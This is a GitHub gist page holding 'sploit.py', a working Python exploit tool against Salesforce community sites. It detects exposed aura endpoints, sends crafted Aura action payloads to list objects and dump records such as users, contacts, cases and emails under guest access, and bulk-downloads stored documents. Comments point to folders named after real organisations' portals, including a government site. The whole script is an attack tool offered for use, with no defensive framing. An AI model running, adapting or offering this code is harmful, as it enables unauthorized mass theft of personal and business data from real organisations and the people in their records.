Skip to content

Instantly share code, notes, and snippets.

@sfboss
Last active June 7, 2024 08:39
Show Gist options
  • Save sfboss/bbfda5e245abda007d16c810be0ef954 to your computer and use it in GitHub Desktop.
Save sfboss/bbfda5e245abda007d16c810be0ef954 to your computer and use it in GitHub Desktop.
sploit.py
import mimetypes
import requests
import urllib.request
import urllib.parse
from urllib.error import URLError, HTTPError
import json
from json import JSONDecodeError
import argparse
import re
import os
import sys
import ssl
from termcolor import colored
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
AURA_PATH_PATTERN = ("aura", "s/aura", "s/sfsites/aura", "sfsites/aura")
PAYLOAD_PULL_CUSTOM_OBJ = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}]}'
SF_OBJECT_NAME = (
"Case",
"Account",
"User",
"Contact",
"Document",
"ContentDocument",
"ContentVersion",
"ContentBody",
"CaseComment",
"Note",
"Employee",
"Attachment",
"EmailMessage",
"CaseExternalDocument",
"Attachment",
"Lead",
"Name",
"EmailTemplate",
"EmailMessageRelation",
)
DEFAULT_PAGE_SIZE = 100
MAX_PAGE_SIZE = 1000
DEFAULT_PAGE = 1
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
def http_request(url, values="", method="GET"):
headers = {"User-Agent": USER_AGENT}
if method == "POST":
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = urllib.parse.urlencode(values)
data = data.encode("ascii")
request = urllib.request.Request(url, data=data, method=method, headers=headers)
else:
request = urllib.request.Request(url, method=method, headers=headers)
response_body = ""
try:
with urllib.request.urlopen(request, context=ctx) as response:
response_body = response.read().decode("utf-8")
except URLError as e:
raise
return response_body
def check(url):
method = "POST"
obj = {}
json_data = json.dumps(obj).encode("utf-8")
aura_endpoints = []
for path in AURA_PATH_PATTERN:
tmp_aura_endpoint = urllib.parse.urljoin(url, path)
try:
response_body = http_request(tmp_aura_endpoint, values={}, method="POST")
except HTTPError as e:
response_body = e.read().decode("utf-8")
if "aura:invalidSession" in response_body:
aura_endpoints.append(tmp_aura_endpoint)
return aura_endpoints
def get_aura_context(url):
response_body = ""
try:
response_body = http_request(url)
except Exception as e:
print("[-] Failed to access the url")
raise
if ("window.location.href ='%s" % url) in response_body:
location_url = re.search(r"window.location.href =\'([^\']+)", response_body)
url = location_url.group(1)
try:
response_body = http_request(url)
except Exception as e:
print("[-] Failed to access the redirect url")
raise
aura_encoded = re.search(r"\/s\/sfsites\/l\/([^\/]+fwuid[^\/]+)", response_body)
if aura_encoded is not None:
response_body = urllib.parse.unquote(aura_encoded.group(1))
fwuid = re.search(r'"fwuid":"([^"]+)', response_body)
markup = re.search(r'"(APPLICATION@markup[^"]+)":"([^"]+)"', response_body)
app = re.search(r'"app":"([^"]+)', response_body)
if fwuid is None or markup is None or app is None:
raise Exception("Couldn't find fwuid or markup")
aura_context = '{"mode":"PROD","fwuid":"' + fwuid.group(1)
aura_context += '","app":"' + app.group(1) + '","loaded":{"' + markup.group(1)
aura_context += '":"' + markup.group(2) + '"},"dn":[],"globals":{},"uad":false}'
return aura_context
def dynamic_file_download(url, contentid, folderpath, title):
theurl = f"{url}/sfc/servlet.shepherd/document/download/{contentid}?operationContext = S1"
# theurl = theurl.replace("/s//", "/")
status = ""
response = requests.get(theurl, headers={"User-Agent": USER_AGENT}, stream=True)
if response.status_code == 200:
content_type = response.headers.get("content-type")
# guess file extension
extension = mimetypes.guess_extension(content_type, strict=False)
if extension is None:
if "png" in content_type:
extension = ".png"
elif "jpeg" in content_type:
extension = ".jpg"
elif "pdf" in content_type:
extension = ".pdf"
elif "text" in content_type:
extension = ".txt"
# Use the extension to form the file name (add more logic here if needed)
output_filename = "output_{}{}".format(contentid, extension)
if title is not None and "." in title:
output_filename = title
else:
output_filename = "output_{}{}".format("(" + title + ")", extension)
fullpath = folderpath + output_filename
with open(fullpath, "wb") as out_file:
out_file.write(response.content)
status = "success"
else:
status = "failed"
# return the filename and full path to the file'}
return {
"filename": output_filename,
"fullpath": fullpath,
"id": contentid,
"title": title,
"status": status,
}
def get_url_from_folder(foldername):
# turn the folder back into a site url
siteurl = foldername.replace("sploits/", "")
siteurl = siteurl.replace("https_", "https://")
siteurl = siteurl.replace("com__", "com_")
siteurl = siteurl.replace("com_", "com/")
siteurl = siteurl.replace("com_s_", "com/s/")
siteurl = siteurl.replace("_s_", "/s/")
siteurl = siteurl.replace("_s", "/s")
siteurl = siteurl.replace("/s_", "/s/")
siteurl = siteurl.replace("/s//", "/s/")
return siteurl
def process_content_documents_all(filepath):
# go through folder sploits and process each folder in there for its content docs which will be json files inside each folder with ContentDocument__ listed in the filename
# for each file, open it and read it as json
import os
import json
links = []
all_links = []
all_results = []
last_total = 0
net_new_kws = []
thejson = []
theids = []
resultsexist = False
for folder, subfolders, files in os.walk(filepath):
resultsexist = False
theids = []
links = []
theurl = get_url_from_folder(folder)
theurl = theurl.replace(".gov_", ".gov")
print(colored("Starting to process files: " + theurl, "green"))
if os.path.exists(folder + "/content/results.csv"):
resultsexist = True
print(colored("Results already exist for this folder, skipping", "red"))
if resultsexist == False:
# find the file that has ContentDocument__ in the name like '/Users/clayboss/Desktop/Entry Point/Projects/Personal/Side Projects/source_REPOSITORIES/sfdcboss_python/sploits/https_americantower.my.site.com__Portal_s_/ContentDocument__page1.json'
try:
for file in files:
# if file is links.txt get the array of strings inside
if "ContentDocument__" in file:
# open the file and read it as json
with open(folder + "/" + file) as json_file:
result = {}
thejson = []
thedata = json.loads(open(folder + "/" + file).read())
thejson = thedata["result"]
for record in thejson:
links.append(
{
"id": record["record"]["Id"],
"title": record["record"]["Title"],
}
)
if len(links) > 0:
# create dir if it doesnt exist at folder + '/content/'
if not os.path.exists(folder + "/content/"):
os.makedirs(folder + "/content/")
import pandas as pd
# create df to store the results of each link attempt to download
df = pd.DataFrame(columns=["id", "title", "result"])
for link in links:
print(theurl)
print(link["id"])
result = dynamic_file_download(
theurl, link["id"], folder + "/content/", link["title"]
)
# add the result to the df using pd concat
df = pd.concat(
[
df,
pd.DataFrame(
[[link["id"], link["title"], result["status"]]],
columns=["id", "title", "result"],
),
]
)
# save the df to a csv
df.to_csv(folder + "/content/results.csv", index=False)
# print the df
print(df)
except:
print(colored("Error processing files: " + theurl, "red"))
print(
colored(
"Done trying to process files (count "
+ str(len(links))
+ "): "
+ theurl,
"green",
)
)
def process_content_documents(filepath):
# go through folder sploits and process each folder in there for its content docs which will be json files inside each folder with ContentDocument__ listed in the filename
# for each file, open it and read it as json
import os
import json
links = []
all_links = []
all_results = []
last_total = 0
net_new_kws = []
thejson = []
theids = []
for folder, subfolders, files in os.walk(filepath):
theids = []
# find the file that has ContentDocument__ in the name like '/Users/clayboss/Desktop/Entry Point/Projects/Personal/Side Projects/source_REPOSITORIES/sfdcboss_python/sploits/https_americantower.my.site.com__Portal_s_/ContentDocument__page1.json'
for file in files:
if "ContentDocument__" in file:
# open the file and read it as json
with open(folder + "/" + file) as json_file:
result = {}
thejson = []
thedata = json.loads(open(folder + "/" + file).read())
thejson = thedata["result"]
for record in thejson:
theids.append(record["record"]["Id"])
# write ids.txt for folder
with open(folder + "/" + "ids.txt", "w") as outfile:
json.dump(theids, outfile)
def create_payload_for_getItems(object_name, page_size, page):
payload = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"'
payload += object_name
payload += '","layoutType":"FULL",'
payload += '"pageSize":%s' % page_size
payload += ',"currentPage":%s' % page
payload += ',"useTimeout":false,"getCount":true,"enableRowActions":false}}]}'
return payload
def create_payload_for_getRecord(recode_id):
payload = '{"actions":[{"id":"pwn","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"'
payload += recode_id
payload += '","record":null,"inContextOfComponent":"","mode":"VIEW","layoutType":"FULL","defaultFieldValues":null,"navigationLocation":"LIST_VIEW_ROW"}}]}'
return payload
def exploit(aura_endpoint, payload, aura_context):
url = aura_endpoint + "?r=1&applauncher.LoginForm.getLoginRightFrameUrl=1"
values = {
"message": payload,
"aura.context": aura_context,
"aura.token": "undefined",
}
try:
response_body = http_request(url, values=values, method="POST")
response_json = json.loads(response_body)
except JSONDecodeError as je:
raise Exception("JSON Decode error. Response -> %s" % response_body)
except Exception as e:
raise e
return response_json
def pull_object_list(aura_endpoint, aura_context):
print("[+] Pull the object list")
sf_all_object_name_list = []
try:
response = exploit(aura_endpoint, PAYLOAD_PULL_CUSTOM_OBJ, aura_context)
if (
response.get("exceptionEvent") is not None
and response.get("exceptionEvent") is True
):
raise Exception(response)
if (
response.get("actions") is None
or response.get("actions")[0].get("state") is None
):
raise Exception("Failed to get actions: %s" % response)
SF_OBJECT_NAME_dict = (
response.get("actions")[0].get("returnValue").get("apiNamesToKeyPrefixes")
)
SF_OBJECT_NAME_list = [
key for key in SF_OBJECT_NAME_dict.keys() if not key.endswith("__c")
]
sf_custom_object_name = [
key for key in SF_OBJECT_NAME_dict.keys() if key.endswith("__c")
]
sf_all_object_name_list = [key for key in SF_OBJECT_NAME_dict.keys()]
except Exception as e:
print("[-] Failed to pull the object list.")
print("[-] Error: %s" % e)
else:
print("[+] Default object list")
print(SF_OBJECT_NAME_list)
print("[+] Custom object list")
print(sf_custom_object_name)
return sf_all_object_name_list
def dump_record(aura_endpoint, aura_context, record_id):
print("[+] Dumping the record")
payload = create_payload_for_getRecord(args.record_id)
try:
response = exploit(aura_endpoint, payload, aura_context)
except Exception as e:
print("[-] Failed to dump the record.")
return None
if response.get("actions")[0].get("state") != "SUCCESS":
return None
print("[+] State: %s" % response.get("actions")[0].get("state"))
print("[+] Record result: ")
print(
json.dumps(
response.get("actions")[0].get("returnValue"), ensure_ascii=False, indent=2
)
)
def dump_object(
aura_endpoint,
aura_context,
object_name,
page_size=DEFAULT_PAGE_SIZE,
page=DEFAULT_PAGE,
):
print('[+] Getting "%s" object (page number %s)...' % (object_name, page))
payload = create_payload_for_getItems(object_name, page_size, page)
try:
response = exploit(aura_endpoint, payload, aura_context)
if (
response.get("exceptionEvent") is not None
and response.get("exceptionEvent") is True
):
raise Exception(response)
except Exception as e:
print("[-] Failed to exploit.")
print("[-] Error: %s" % e)
return None
try:
actions = response.get("actions")[0]
state = response.get("actions")[0].get("state")
except:
return None
return_value = actions.get("returnValue")
try:
total_count = return_value.get("totalCount")
result_count = return_value.get("result")
except:
total_count = "None"
result_count = []
print(
"[+] State: %s, Total: %s, Page: %s, Result count: %s"
% (state, total_count, page, len(result_count))
)
if state == "ERROR":
print("[+] Error message: %s" % actions.get("error")[0])
return response
def dump_and_save_objects(aura_endpoint, aura_context, output_dir, flag_full):
sf_all_object_name_list = pull_object_list(aura_endpoint, aura_context)
if flag_full:
page_size = MAX_PAGE_SIZE
else:
page_size = DEFAULT_PAGE_SIZE
failed_object = []
dumped_object_count = 0
for object_name in sf_all_object_name_list:
page = DEFAULT_PAGE
while True:
response = dump_object(
aura_endpoint, aura_context, object_name, page_size, page
)
if response is None:
failed_object.append(object_name)
break
return_value = response.get("actions")[0].get("returnValue")
file_path = os.path.join(
output_dir, "%s__page%s.json" % (object_name, page)
)
with open(file_path, "w", encoding="utf_8") as fw:
try:
fw.write(json.dumps(return_value, ensure_ascii=False, indent=2))
dumped_object_count += 1
except Exception as e:
failed_object.append(object_name)
page += 1
if (
flag_full is False
or return_value is None
or return_value.get("result") is None
):
break
if len(return_value.get("result")) < page_size:
break
if len(failed_object) > 0:
print(
"[-] Failed to dump '%s' object. Please try manually with -o option."
% ", ".join(failed_object)
)
if dumped_object_count > (len(sf_all_object_name_list) / 2):
return True
else:
return False
def init():
parser = argparse.ArgumentParser(
description="Exploit Salesforce through the aura endpoint with the guest privilege"
)
parser.add_argument(
"-u", "--url", type=str, help="set the SITE url. e.g. http://url/site_path"
)
parser.add_argument(
"-o",
"--objects",
help='set the object name. Default value is "User" object. Juicy Objects: %s'
% ",".join(SF_OBJECT_NAME),
nargs="*",
default=["User"],
)
parser.add_argument(
"-l", "--listobj", help="pull the object list.", action="store_true"
)
parser.add_argument(
"-c", "--check", help="only check aura endpoint", action="store_true"
)
parser.add_argument("-a", "--aura_context", help="set your valid aura_context")
parser.add_argument(
"-r", "--record_id", help="set the recode id to dump the record"
)
parser.add_argument(
"-d",
"--dump_objects",
help="dump a small number of objects accessible to guest users and saves them in the file.",
action="store_true",
)
parser.add_argument(
"-f",
"--full",
help="if set with -d, dump all pages of objects.",
action="store_true",
)
parser.add_argument(
"-s",
"--skip",
help="if set with -d, skip the objects already dumped.",
action="store_true",
)
parser.add_argument(
"-v", "--vacuum", help="delete empty results in sploits.", action="store_true"
)
parser.add_argument(
"--content", help="delete empty results in sploits.", action="store_true"
)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = init()
# aura_endpoint
if args.content:
process_content_documents_all("sploits")
elif args.vacuum:
# recursively go through the folders in the sploits folder , and remove any json files where the body of the json in the file has an empty results array. the only json files left in the folders containing json files found in sploits directory should be ones with items in the results array
for root, dirs, files in os.walk(
"/Users/clayboss/Desktop/Entry Point/Projects/Personal/Side Projects/source_REPOSITORIES/sploit/"
):
for file in files:
if file.endswith(".json"):
try:
with open(os.path.join(root, file), "r") as f:
data = json.load(f)
# if file is null or empty, delete it
if (
data is None
or data["result"] is None
or len(data["result"]) == 0
):
os.remove(os.path.join(root, file))
print(
"[-] Deleted empty result file: %s"
% os.path.join(root, file)
)
except Exception as e:
print("[-] Error: %s" % e)
continue
else:
aura_endpoints = check(args.url)
if len(aura_endpoints) == 0:
print("[-] Url doesn't seems to be vulnerable - not_vuln - done")
sys.exit(0)
else:
print("[+] %s seems to be vulnerable. - is_vuln - donedo " % (aura_endpoints))
if args.check:
sys.exit(0)
print("[+] Start exploit")
if args.aura_context is not None and len(args.aura_context) > 1:
aura_context = args.aura_context
else:
try:
aura_context = get_aura_context(args.url)
except Exception as e:
print("[-] Failed to get aura context.")
sys.exit(0)
result = False
for aura_endpoint in aura_endpoints:
print("-----")
print("[+] Endpoint: %s" % aura_endpoint)
if args.listobj:
sf_all_object_name_list = pull_object_list(aura_endpoint, aura_context)
elif args.record_id:
dump_record(aura_endpoint, aura_context, args.record_id)
elif args.dump_objects:
if result and args.skip:
print("[+] Skip to dump")
continue
url = urllib.parse.urlparse(args.url)
urlpath = url.path.replace("/", "_")
urlnetloc = url.netloc.replace(":", "_")
output_dir = os.path.join(
os.getcwd(), url.scheme + "_" + urlnetloc + "_" + urlpath
)
os.makedirs(output_dir, exist_ok=True)
result = dump_and_save_objects(
aura_endpoint, aura_context, output_dir, args.full
)
elif args.objects:
for object_name in args.objects:
response = dump_object(aura_endpoint, aura_context, object_name)
if response is None:
continue
return_value = response.get("actions")[0].get("returnValue")
print("[+] Result: ")
print(json.dumps(return_value, ensure_ascii=False, indent=2))
else:
print("[-] No arguments provided.")
sys.exit(0)
print("-----")
# yt-dlp "ytsearch50:'white house presidential tape recordings'" -o '%(title)s.%(ext)s' --write-info-json --write-annotations --write-thumbnail --write-sub --write-auto-sub --sub-lang en --embed-subs --add-metadata --write-description --write-all-thumbnails --all-subs --convert-subs srt --convert-subs vtt --convert-subs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment